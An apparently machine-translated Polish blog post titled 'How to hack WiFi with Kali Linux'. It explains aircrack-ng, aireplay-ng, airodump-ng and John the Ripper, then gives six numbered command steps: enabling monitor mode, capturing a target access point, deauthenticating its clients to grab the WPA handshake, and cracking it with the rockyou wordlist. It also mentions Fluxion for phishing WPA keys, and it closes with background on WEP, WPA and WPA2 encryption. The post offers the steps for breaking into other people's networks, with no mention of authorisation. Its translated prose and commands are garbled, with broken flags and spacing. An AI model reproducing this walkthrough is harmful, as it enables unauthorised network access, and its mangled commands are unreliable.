Jak Włamać Wifi Za Pomocą Kali Linux?

Najczęściej zadawane pytanie na Google jest jak włamać Wifi za pomocą Kali Linux, Hack wifi, Jak włamać Wifi za pomocą Kali Linux, itp. Ale najpierw zrozum, co to jest Wifi & jego Szyfrowanie.

treść postu

Co To jest Wi-Fi i czy można go zhakować?

Wi-Fi to nazwa popularnej technologii sieci bezprzewodowych, która wykorzystuje fale radiowe do zapewnienia szybkiego bezprzewodowego Internetu i połączeń sieciowych. Powszechnym błędem jest to, że termin Wi-Fi jest skrótem od „wierności bezprzewodowej”, jednak tak nie jest. Wi-Fi jest po prostu znakiem towarowym, który oznacza IEEE 802.11 x.

kiedy mówimy o włamaniu do wifi z dowolnego urządzenia, bezpieczeństwo tego Wi-Fi ma największe znaczenie. Więc kiedy staramy się włamać wifi jest bardzo łatwo złamać lub włamać hasło WPS dostępny system. WPS jest jednym z rodzajów szyfrowania, który jest używany do zabezpieczenia sieci Wi-Fi, więc zacznijmy od szybkiego samouczka.

narzędzia używane do włamania WiFi Hasło w Kali-Linux

głównie używamy Kali Linux wbudowany zestaw narzędzi do włamania wifi hasło, które jest następujące:

  • airmon-ng
  • aireplay-ng
  • airodump-ng
  • hccap
  • john the ripper
  • aircrack-ng

Airmon-ng

ten skrypt może być użyty do Włącz tryb monitorowania na interfejsach bezprzewodowych. Może być również używany do powrotu z trybu monitora do trybu zarządzanego. Wprowadzenie polecenia airmon-ng bez parametrów pokaże stan interfejsów.

: airmon-ng <start|stop> <interfejs> lub airmon-ng <check|check kill>

Aireplay-ng

Aireplay-ng służy do wstrzykiwania ramek.

podstawową funkcją jest generowanie ruchu do późniejszego wykorzystania w aircrack-ng do łamania kluczy WEP i WPA-PSK. Istnieją różne ataki, które mogą powodować deauthentications w celu przechwytywania danych WPA handshake, fake authentications, Interactive packet replay, hand-crafted ARP request injection i ARP-request reinjection. Dzięki narzędziu packetforge-ng możliwe jest tworzenie dowolnych ramek.

większość sterowników musi być załatana, aby móc wstrzykiwać.

Airodump-ng

Airodump-NG jest używany do przechwytywania pakietów ramek raw 802.11 i jest szczególnie odpowiedni do zbierania WEP IVs (Wektor inicjalizacji) w celu użycia ich z aircrack-ng. Jeśli masz odbiornik GPS podłączony do komputera, airodump-ng może rejestrować współrzędne znalezionych punktów dostępowych.

dodatkowo airodump-ng zapisuje kilka plików zawierających szczegóły wszystkich widzianych punktów dostępowych i klientów.

Hccap

aby przekonwertować hasze przechwytywania aircrack-ng na .hccapx używamy tej komendy.

John the Ripper

aby złamać hasło, używamy john the ripper w ostatnim etapie. używamy tego narzędzia do porównywania skrótów ze słownikiem haseł. Istnieje wiele innych sposobów, ale spróbujemy jednego z nich.

Aircrack-ng

Aircrack-ng to kompletny zestaw narzędzi do oceny bezpieczeństwa sieci WiFi.

skupia się na różnych obszarach bezpieczeństwa WiFi:

  • monitorowanie: Przechwytywanie pakietów i eksport danych do plików tekstowych w celu dalszego przetwarzania przez narzędzia innych firm
  • atakowanie: ataki powtórne, deauthentication, fałszywe punkty dostępowe i inne za pomocą wtrysku pakietów
  • testowanie: sprawdzanie kart WiFi i możliwości sterownika (przechwytywanie i Wtrysk)
  • pękanie: WEP i WPA PSK (WPA 1 i 2)

kroki, aby włamać WiFi za pomocą Kali-Linux lub z jakimkolwiek innym systemem operacyjnym Debian Linux.

wszystkie polecenia z opisem są podane powyżej sprawdź, czy jeśli masz jakiś problem.

Krok 1 :

najpierw weź kartę sieciową w tryb monitora, aby monitorować otaczające sieci.

# airmon-ng start wlan1

1
2

#airodump-ng wlan1mon

3
4

Krok 2:

#airodump-ng –bssid 2C:55:D3: B1: 35: 0C-C 1-w kalip300 wlan1mon

5
6

Krok 3:

#aireplay-ng -0 0-a 2C:55:D3:B1: 35:0C wlan1mon

7

po udanym uchwyceniu pliku handshak widzimy coś takiego.

8

Krok 4:

# aircrack-ng kalip300-01.cap-J john

9

Krok 5:

#hccap2john john.hccap > wpa

Krok 6:

# john-wordlist* / root / Desktop / rockyou.txt / root / Desktop / wpa

i sucsessfully włamać hasło wifi przez Kali linux

Wifi Hacking narzędzie :- Fluxion

Fluxion to narzędzie do audytu bezpieczeństwa i badań socjotechnicznych. Jest to remake linset przez vk496 z (miejmy nadzieję) mniej błędów i więcej funkcjonalności. Skrypt próbuje odzyskać klucz WPA / WPA2 z docelowego punktu dostępu za pomocą ataku socjotechnicznego (phishing). Jest kompatybilny z najnowszym wydaniem Kali (rolling). Konfiguracja ataków Fluxion jest w większości Manualna, ale eksperymentalny tryb automatyczny obsługuje niektóre parametry konfiguracji ataków. Przeczytaj FAQ przed zgłoszeniem problemów.

Szyfrowanie bezprzewodowe

Szyfrowanie WEP

Wired Equivalent Privacy (WEP) to protokół bezprzewodowy IEEE 802.11, który zapewnia algorytmy bezpieczeństwa poufności danych podczas transmisji bezprzewodowych.

WEP używa 24-bitowego wektora inicjalizacji (IV) do utworzenia szyfru strumieniowego RC4 dla zachowania poufności, a suma kontrolna CRC-32 dla intergrity transmisji bezprzewodowej.

jak działa WEP

  1. suma kontrolna CRC-32 służy do obliczenia 32-bitowej wartości sprawdzania integralności (ICV) dla danych, które z kolei są dodawane do ramki danych.

2. 24-bitowa dowolna liczba znana jako wektor inicjalizacji (IV) jest dodawana do klucza WEP; klucz WEP i IV są razem nazywane jako WEP seed.

3. WEP seed jest używany jako wejście do algorytmu RC4 do generowania strumienia klucza (strumień klucza jest bitowo XOred z kombinacją danych i ICV do produkcji zaszyfrowanych danych).

4. Pole IV (IV+PAD+KID) jest dodawane do zaszyfrowanego tekstu, aby wygenerować ramkę MAC

jak działa WEP

szyfrowanie WPA

Wi-Fi Protected Access (WPA) to metoda szyfrowania danych WLAN oparta na 802.11 standardów.

jest to migawka 802.11 i (w fazie rozwoju) zapewniająca silniejsze szyfrowanie i włączająca PSK do uwierzytelniania EAP.

jak działa WPA

Tymczasowy klucz szyfrowania, adres transmisji i licznik sekwencji TKIP (TSC) są używane jako dane wejściowe do algorytmu RC4 do generowania keystram.

MAC Service Data Unit (MSDU) i message intergrity check (MIC)są łączone przy użyciu algorytmu Michaela.

połączenie MSDU i MIC jest fragmentowane w celu wygenerowania jednostki danych protokołu MAC (MPDU).

32-bitowa wartość sprawdzania integralności (ICV) jest obliczana dla MPDU

połączenie MPDU i ICV jest bitowo XORed za pomocą Keysteam w celu wytworzenia zaszyfrowanych danych

IV jest dodawany do zaszyfrowanych danych w celu wygenerowania ramki komputera MAC.

szyfrowanie WPA 2

WPA 2 zapewnia użytkownikom korporacyjnym i WI-FI lepszą ochronę danych i kontrolę dostępu do sieci

zapewnia bezpieczeństwo klasy rządowej dzięki wdrożeniu algorytmu szyfrowania AES zgodnego z normą FIPS 140-2.

WPA2 – Personal

WPA2 – Personal używa ustawionego hasła (wstępnie udostępnionego klucza) w celu ochrony nieautoryzowanego dostępu do sieci.

w trybie PSK każde urządzenie sieci bezprzewodowej szyfruje ruch sieciowy za pomocą 128-bitowego klucza, który pochodzi z hasła od 8 do 63 znaków ASCII.

WPA2-Enterprise

zawiera EAP lub RADIUS do scentralizowanego uwierzytelniania klienta przy użyciu wielu metod uwierzytelniania, takich jak karty tokenowe, Kerberos, certyfikaty itp.

Użytkownicy mają przypisane poświadczenia logowania przez scentralizowany serwer, który muszą przedstawić podczas łączenia się z siecią.

jak działa WPA2

w implementacji CCMP WPA2, dane nagłówka Mac są używane do budowania additonal authentication data (Aad).

sekwencyjny numer pakietu (PN) jest używany do budowania nonce.

AAD, klucz temporalny i nonce wraz z CCMP są używane do szyfrowania danych.

ramka Mac WPA2 jest zbudowana przy użyciu nagłówka MAC, nagłówka CCMP, zaszyfrowanych danych i zaszyfrowanego mikrofonu

 jak działa WPA2

możesz przegapić, jak włamać się do telefonu

Write a Comment

Twój adres e-mail nie zostanie opublikowany.